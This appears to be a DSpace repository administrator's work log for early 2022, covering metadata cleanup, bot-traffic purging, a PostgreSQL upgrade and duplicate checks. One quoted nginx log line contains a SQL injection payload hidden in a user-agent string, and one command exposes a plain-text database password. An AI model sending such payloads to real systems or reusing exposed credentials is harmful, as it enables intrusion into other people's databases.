    +
  • +
  • Delete one duplicate item I saw in ILRI’s Journal Articles collection +
      +
    • Also do some general cleanup on ILRI’s Journal Articles collection in OpenRefine and csv-metadata-quality
    • +
    +
  • +
+

2022-01-29

+
    +
  • I did some more cleanup on the ILRI Journal Articles +
      +
    • I added missing journal titles for items that had ISSNs
    • +
    • Then I added pages for items that had them in the citation
    • +
    • First, I faceted the citation field based on whether or not the item had something like “: 232-234” present:
    • +
    +
  • +
+
value.contains(/:\s?\d+(-|–)\d+/)
+
    +
  • Then I faceted by blank on dcterms.extent and did a transform to extract the page information for over 1,000 items!
  • +
+
'p. ' +
+cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
+'-' +
+cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
+
    +
  • Then I did similar for cg.volume and cg.issue, also based on the citation, for example to extract the “16” from “Journal of Blah 16(1)”, where “16” is the second capture group in a zero-based match:
  • +
+
cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
+
    +
  • This was 3,000 items so I imported the changes on CGSpace 1,000 at a time…
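  • One way to split a large CSV like that into 1,000-row chunks while keeping the header is something like this (a sketch; the file name is a placeholder, and fields with embedded newlines would need csvkit or similar instead of a naive split):

$ head -n1 /tmp/ilri-articles.csv > /tmp/header.csv
$ tail -n +2 /tmp/ilri-articles.csv | split -l 1000 - /tmp/ilri-chunk-
$ for f in /tmp/ilri-chunk-*; do cat /tmp/header.csv "$f" > "$f.csv"; done
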
  • +

February, 2022


2022-02-01

+
    +
  • Meeting with Peter and Abenet about CGSpace in the One CGIAR +
      +
    • We agreed to buy $5,000 worth of credits from Atmire for future upgrades
    • +
    • We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
    • +
    • We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
    • +
    • We agreed to try to do more alignment of affiliations/funders with ROR
    • +
    +
  • +
+
    +
  • I moved a bunch of communities:
  • +
+
$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
+$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
+$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
+$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
+$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
+$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
+$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
+$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
+$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
+$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
+$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
+$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
+$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
+$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
+$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
+$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
+$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
+$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
+$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
+$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
+$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
+$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
+
    +
  • Remove CPWF and CTA subjects from the Discovery facets
  • +
  • Start a full Discovery index on CGSpace:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    275m15.777s
+user    182m52.171s
+sys     2m51.573s
+
    +
  • I got a request to confirm validation of CGSpace on openarchives.org, with the requestor’s IP being 128.84.116.66 +
      +
    • That is at Cornell… hmmmm who could that be?!
    • +
    • Oh, the OpenArchives initiative is at Cornell… maybe this is an automated periodic check?
    • +
    +
  • +
+

2022-02-02

+
    +
  • Looking at the top user agents and IP addresses in CGSpace’s Solr statistics for 2022-01 +
      +
    • 64.39.98.40 made 26,000 requests, owned by Qualys so it’s some kind of security scanning
    • +
    • 45.134.26.171 made 8,000 requests and it’s owned by some Russian company and makes requests like this hmmmmm:
    • +
    +
  • +
+
45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
+
    +
  • 3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon +
      +
    • The user agent is sometimes a normal user one, and sometimes Apache-HttpClient/4.3.4 (java 1.5)
    • +
    +
  • +
  • 217.182.21.193 made 2,400 requests and is on OVH
  • +
  • I purged these hits
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 26817 hits from 64.39.98.40 in statistics
+Purging 9446 hits from 45.134.26.171 in statistics
+Purging 6490 hits from 3.225.28.105 in statistics
+Purging 11949 hits from 217.182.21.193 in statistics
+
+Total number of bot hits purged: 54702
+
    +
  • Export donors and affiliations from CGSpace database:
  • +
+
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
+COPY 1036
+localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
+COPY 7901
+
    +
  • Then check matches against the latest ROR dump:
  • +
+
$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
+$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
+...
+
    +
  • I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)
  • +
  • I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)
  • +
  • Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test
  • +
  • Mishell from CIP sent me a copy of a security scan their ICT had done on CGSpace using QualysGuard +
      +
    • The report was very long and generic, highlighting low-severity things like being able to post crap to search forms and have it appear on the results page
    • +
    • Also they say we’re using old jQuery and bootstrap, etc (fair enough) but there are no exploits per se
    • +
    • At least now I know why all those Qualys IPs are scanning us all the time!!!
    • +
    +
  • +
  • Mishell also said she’s having issues logging into CGSpace +
      +
    • According to the logs her account is failing on LDAP authentication
    • +
    • I checked CGSpace’s LDAP credentials using ldapsearch and was able to connect so it’s gotta be something with her account
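    • The check was roughly like this (a sketch with placeholder host, bind DN, and search base rather than our real ones):

$ ldapsearch -x -H ldaps://ldap.example.org:636 -D "binduser@example.org" -W -b "dc=example,dc=org" "(sAMAccountName=someuser)" cn mail
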
    • +
    +
  • +
+

2022-02-03

+
    +
  • I synchronized DSpace Test with a fresh snapshot of CGSpace
  • +
  • I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the dspace filter-media script manually and eventually it crashed:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
+...
+SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
+Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
+SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
+File: Agreement_on_the_Estab_of_ILRI.doc.txt
+Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
+java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
+        at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
+        at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
+        at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
+        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
+        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
+        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
+        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
+        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
+        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
+        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
+        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
+        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
+

2022-02-04

+
    +
  • I found a thread on the dspace-tech mailing list about the media-filter crash above +
      +
    • The problem is that the default filter for Word files is outdated, so we need to switch to the PoiWordFilter extractor
    • +
    • After changing that I was able to filter the Word file on that item above:
    • +
    +
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
+The following MediaFilters are enabled: 
+Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
+org.dspace.app.mediafilter.PoiWordFilter
+File: Agreement_on_the_Estab_of_ILRI.doc.txt
+
+FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
+
    +
  • Meeting with the repositories working group to discuss issues moving forward in the One CGIAR
  • +
+

2022-02-07

+
    +
  • Gaia sent me her feedback on the duplicates for the TAC and ICW items for CGSpace a few days ago +
      +
    • I used the IDs marked “delete” in her spreadsheet to create a custom text facet with this GREL in OpenRefine:
    • +
    +
  • +
+
or(
+isNotNull(value.match('1')),
+isNotNull(value.match('4')),
+isNotNull(value.match('5')),
+isNotNull(value.match('6')),
+isNotNull(value.match('8')),
+...
+isNotNull(value.match('178')),
+isNotNull(value.match('186')),
+isNotNull(value.match('188')),
+isNotNull(value.match('189')),
+isNotNull(value.match('197'))
+)
+
    +
  • Then I flagged all of these (seventy-five items)… +
      +
    • I decided to flag the deletes instead of star the keeps because there are some items in the original file that were not marked as duplicates so we have to keep those too
    • +
    +
  • +
  • I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
+$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
+$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
+
    +
  • Then I sent this second batch of items to Gaia to look at
  • +
+

2022-02-08

+
    +
  • Create a SAF archive for the first 200 items (IDs 1 to 200) that were not flagged as duplicates and upload them to a new collection on DSpace Test:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
+
    +
  • Fix some occurrences of “Hammond, Jim” to be “Hammond, James” on CGSpace
  • +
  • Start a full index on AReS
  • +
+

2022-02-09

+
    +
  • UptimeRobot said that CGSpace was down yesterday evening, but when I looked it was up and I didn’t see a high database load or anything wrong
  • +
  • Maria from Bioversity wrote to say that CGSpace was very slow also…
  • +
+

2022-02-10

+
    +
  • Looking at the Munin graphs on CGSpace I see several metrics showing that there was likely just increased load…
  • +
+

Munin graphs (daily): firewall packets, DSpace sessions, Tomcat pool, PostgreSQL connections

+
    +
  • I extracted the nginx logs for yesterday so I can analyze the traffic:
  • +
+
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
+# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
+# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
+# wc -l /tmp/feb9-ips.txt
+11636 /tmp/feb9-ips.tx
+
    +
  • I started resolving them with my resolve-addresses-geoip2.py script
  • +
  • In the meantime I am looking at the requests and I see a new user agent: 1science Resolver 1.0.0 +
      +
    • Seems to be a defunct project from Elsevier (website down, Twitter account inactive since 2020)
    • +
    +
  • +
  • I also see 3,400 requests from EyeMonIT_bot_version_0.1_(http://www.eyemon.it/), but because it has “bot” in the name it gets heavily throttled… +
      +
    • I wonder who is monitoring CGSpace with that service…
    • +
    +
  • +
  • Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:
  • +
+
$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
+     79 24940
+     89 36908
+    100 9299
+    107 2635
+    110 44546
+    111 16509
+    118 7552
+    120 4837
+    123 50245
+    123 55836
+    147 45899
+    173 33771
+    192 39832
+    202 32934
+    235 29465
+    260 15169
+    466 14618
+    607 24757
+    768 714
+   1214 8075
+
    +
  • The same information, but by org name:
  • +
+
$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
+     92 Orange
+    100 Hetzner Online GmbH
+    100 Philippine Long Distance Telephone Company
+    107 AUTOMATTIC
+    110 ALFA TELECOM s.r.o.
+    111 AMAZON-02
+    118 Viettel Group
+    120 CHINA UNICOM China169 Backbone
+    123 Reliance Jio Infocomm Limited
+    123 Serverel Inc.
+    147 VNPT Corp
+    173 SAFARICOM-LIMITED
+    192 Opera Software AS
+    202 FACEBOOK
+    235 MTN NIGERIA Communication limited
+    260 GOOGLE
+    466 AMAZON-AES
+    607 Ethiopian Telecommunication Corporation
+    768 APPLE-ENGINEERING
+   1214 MICROSOFT-CORP-MSN-AS-BLOCK
+
    +
  • Most of these are pretty normal except “Serverel” and Hetzner perhaps, but their user agents are pretending to be normal users so who knows…
  • +
  • I decided to look in the Solr stats with facet.limit=1000&facet.mincount=1 and found a few more definitely non-human agents: + +
  • +
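  • That kind of check can also be done directly against the statistics core with a facet query, something like this (a sketch; the Solr URL and port are whatever your DSpace uses):

$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&rows=0&facet=true&facet.field=userAgent&facet.limit=1000&facet.mincount=1&wt=json'
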
  • I added them to the ILRI override in the DSpace spider list and ran the check-spider-hits.sh script:
  • +
+
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 234 hits from randint in statistics
+Purging 337 hits from Koha in statistics
+Purging 1164 hits from scalaj-http in statistics
+Purging 1528 hits from scpitspi-rs in statistics
+Purging 3050 hits from lua-resty-http in statistics
+Purging 1683 hits from AHC in statistics
+Purging 1129 hits from acebookexternalhit in statistics
+Purging 534 hits from Iframely in statistics
+Purging 1022 hits from qbhttp in statistics
+Purging 330 hits from ^got in statistics
+Purging 156 hits from ^colly in statistics
+Purging 38 hits from article-parser in statistics
+Purging 1148 hits from SomeRandomText in statistics
+Purging 3126 hits from adreview in statistics
+Purging 217 hits from 1science in statistics
+
+Total number of bot hits purged: 14696
+
    +
  • I don’t have time right now to add any of these to the COUNTER-Robots list…
  • +
  • Peter asked me to add a new item type on CGSpace: Opinion Piece
  • +
  • Map an item on CGSpace for Maria since she couldn’t find it in the item mapper
  • +
+

2022-02-11

+
    +
  • CGSpace is slow and the load has been over 400% for a few hours +
      +
    • The number of DSpace sessions seems normal, even lower than a few days ago
    • +
    • The number of PostgreSQL connections is low, but I see there are lots of “AccessShare” locks (green on Munin, not blue like usual)
    • +
    • I will run all system updates, copy the latest config changes, and restart the server
    • +
    +
  • +
+

2022-02-12

+
    +
  • Install PostgreSQL 12 on my local dev environment to start testing DSpace 6.x workflows with it:
  • +
+
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:12-alpine
+$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
+$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres -c 'ALTER USER dspacetest SUPERUSER;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
+$ psql -h localhost -U postgres -c 'ALTER USER dspacetest NOSUPERUSER;'
+
    +
  • Eventually I will update DSpace Test, then CGSpace (time to start paying off some technical debt!)
  • +
  • Start a full Discovery re-index on CGSpace:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    292m49.263s
+user    201m26.097s
+sys     3m2.459s
+
    +
  • Start a full harvest on AReS
  • +
+

2022-02-14

+
    +
  • Last week Gaia sent me her notes on the second batch of TAC/ICW documents (items 201–400 in the spreadsheet) +
      +
    • I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
    • +
    +
  • +
+
or(
+isNotNull(value.match('201')),
+isNotNull(value.match('203')),
+isNotNull(value.match('209')),
+isNotNull(value.match('209')),
+isNotNull(value.match('215')),
+isNotNull(value.match('220')),
+isNotNull(value.match('225')),
+isNotNull(value.match('226')),
+isNotNull(value.match('227')),
+...
+isNotNull(value.match('396'))
+
    +
  • Then I flagged all matching records and exported a CSV to use with SAFBuilder +
      +
    • Then I imported the SAF bundle on DSpace Test:
    • +
    +
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
+
    +
  • Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
+$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
+$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
+
    +
  • I sent these 300 items to Gaia…
  • +
+

2022-02-16

+
    +
  • Upgrade PostgreSQL on DSpace Test from version 10 to 12 +
      +
    • First, I installed the new version of PostgreSQL via the Ansible playbook scripts
    • +
    • Then I stopped Tomcat and all PostgreSQL clusters and used pg_upgrade to upgrade the old version:
    • +
    +
  • +
+
# systemctl stop tomcat7
+# pg_ctlcluster 10 main stop
+# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
+# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
+# pg_ctlcluster 12 main stop
+# pg_dropcluster 12 main
+# pg_upgradecluster 10 main
+# pg_ctlcluster 12 main start
+
+
$ su - postgres
+$ cat /tmp/generate-reindex.sql
+SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
+FROM pg_class C
+LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
+WHERE nspname = 'public'
+  AND C.relkind = 'r'
+  AND nspname !~ '^pg_toast'
+ORDER BY pg_total_relation_size(C.oid) ASC;
+$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
+$ <trim the extra stuff from /tmp/reindex.sql>
+$ psql dspace < /tmp/reindex.sql
+
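  • To see how much space that reclaimed, one can compare the table and index sizes before and after, for example (a sketch using PostgreSQL’s built-in size functions):

$ psql dspace -c "SELECT pg_size_pretty(pg_total_relation_size('metadatavalue')) AS total, pg_size_pretty(pg_indexes_size('metadatavalue')) AS indexes;"
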
    +
  • I saw that the index on metadatavalue shrunk by about 200MB!
  • +
  • After testing a few things I dropped the old cluster:
  • +
+
# pg_dropcluster 10 main
+# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
+

2022-02-17

+
    +
  • I updated my migrate-fields.sh script to use field names instead of IDs +
      +
    • The script now looks up the appropriate metadata_field_id values for each field in the metadata registry
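    • The lookup is essentially a join against the field and schema registries, roughly like this (a sketch; the field shown is only an example):

$ psql -d dspace -c "SELECT mfr.metadata_field_id FROM metadatafieldregistry mfr JOIN metadataschemaregistry msr ON mfr.metadata_schema_id = msr.metadata_schema_id WHERE msr.short_id='cg' AND mfr.element='contributor' AND mfr.qualifier='affiliation';"
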
    • +
    +
  • +
+

2022-02-18

+
    +
  • Normalize the text_lang attributes of metadata on CGSpace:
  • +
+
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 2838588
+ en        |    1082
+           |     801
+ fr        |       2
+ vn        |       2
+ en_US.    |       1
+ sp        |       1
+           |       0
+(8 rows)
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
+UPDATE 1884
+dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
+UPDATE 2
+dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
+UPDATE 1
+
    +
  • I then exported the entire repository and did some cleanup on DOIs +
      +
    • I found ~1,200 items with no cg.identifier.doi, but which had a DOI in their citation
    • +
    • I cleaned up and normalized a few hundred others to use https://doi.org format
    • +
    +
  • +
  • I’m debating using the Crossref API to search for our DOIs and improve our metadata + +
  • +
  • I cleaned up ~1,200 URLs that were using HTTP instead of HTTPS, fixed a bunch of handles, removed some handles from DOI field, etc
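  • The URL normalization is mostly mechanical; on an exported CSV it could look like this (a sketch; the file name is a placeholder):

$ sed -i -e 's|http://dx.doi.org/|https://doi.org/|g' -e 's|https://dx.doi.org/|https://doi.org/|g' -e 's|http://doi.org/|https://doi.org/|g' /tmp/cgspace-export.csv
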
  • +
+

2022-02-20

+
    +
  • Yesterday I wrote a script to check our DOIs against Crossref’s API and then did some investigation on dates, volumes, issues, pages, and types +
      +
    • While investigating issue dates in OpenRefine I created a new column using this GREL to show the number of days between Crossref’s date and ours:
    • +
    +
  • +
+
abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
+
    +
  • In most cases Crossref’s dates are more correct than ours, though there are a few odd cases that I don’t know what strategy I want to use yet
  • +
  • Start a full harvest on AReS
  • +
+

2022-02-21

+
    +
  • I added support for checking the license of DOIs to my Crossref script +
      +
    • I exported ~2,800 DOIs and ran a check on them, then merged the CGSpace CSV with the results of the script to inspect in OpenRefine
    • +
    • There are hundreds of DOIs missing licenses in our data, even in this small subset of ~2,800 (out of 19,000 on CGSpace)
    • +
    • I spot checked a few dozen in Crossref’s data and found some incorrect ones, like on Elsevier, Wiley, and Sage journals
    • +
    • I ended up using a series of GREL expressions in OpenRefine that ended up filtering out DOIs from these prefixes:
    • +
    +
  • +
+
or(
+value.contains("10.1017"),
+value.contains("10.1007"),
+value.contains("10.1016"),
+value.contains("10.1098"),
+value.contains("10.1111"),
+value.contains("10.1002"),
+value.contains("10.1046"),
+value.contains("10.2135"),
+value.contains("10.1006"),
+value.contains("10.1177"),
+value.contains("10.1079"),
+value.contains("10.2298"),
+value.contains("10.1186"),
+value.contains("10.3835"),
+value.contains("10.1128"),
+value.contains("10.3732"),
+value.contains("10.2134")
+)
+
    +
  • Many many of Crossref’s records are correct where we have no license, and in some cases more correct when we have a different license +
      +
    • I ran license updates on ~167 DOIs in the end on CGSpace
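    • For reference, the license information the script reads is available per DOI from the Crossref REST API, something like this (a sketch; set DOI to a real DOI string):

$ DOI=10.xxxx/example
$ curl -s "https://api.crossref.org/works/$DOI" | python3 -c "import json,sys; print(json.load(sys.stdin)['message'].get('license'))"
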
    • +
    +
  • +
+

2022-02-24

+
    +
  • Update some audience metadata on CGSpace:
  • +
+
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
+UPDATE 354
+dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
+UPDATE 2
+

2022-02-25

+
    +
  • A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401–700 in the spreadsheet) +
      +
    • I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
    • +
    +
  • +
+
or(
+isNotNull(value.match('405')),
+isNotNull(value.match('410')),
+isNotNull(value.match('412')),
+isNotNull(value.match('414')),
+isNotNull(value.match('419')),
+isNotNull(value.match('436')),
+isNotNull(value.match('448')),
+isNotNull(value.match('449')),
+isNotNull(value.match('450')),
+...
+isNotNull(value.match('699'))
+)
+
    +
  • Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
+

2022-02-26

+
    +
  • Upgrade CGSpace (linode18) to Ubuntu 20.04
  • +
  • Start a full AReS harvest
  • +

March, 2022


2022-03-01

+
    +
  • Send Gaia the last batch of potential duplicates for items 701 to 980:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+

2022-03-04

+
    +
  • Looking over the CGSpace Solr statistics from 2022-02 +
      +
    • I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!
    • +
    • Here are some of the more prevalent or weird ones: +
        +
      • axios/0.21.1
      • +
      • Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
      • +
      • Nutraspace/Nutch-1.2 (www.nutraspace.com)
      • +
      • Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
      • +
      • Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
      • +
      • Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
      • +
      • Crowsnest/0.5 (+http://www.crowsnest.tv/)
      • +
      • Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
      • +
      • metha/0.2.27
      • +
      • ZaloPC-win32-24v454
      • +
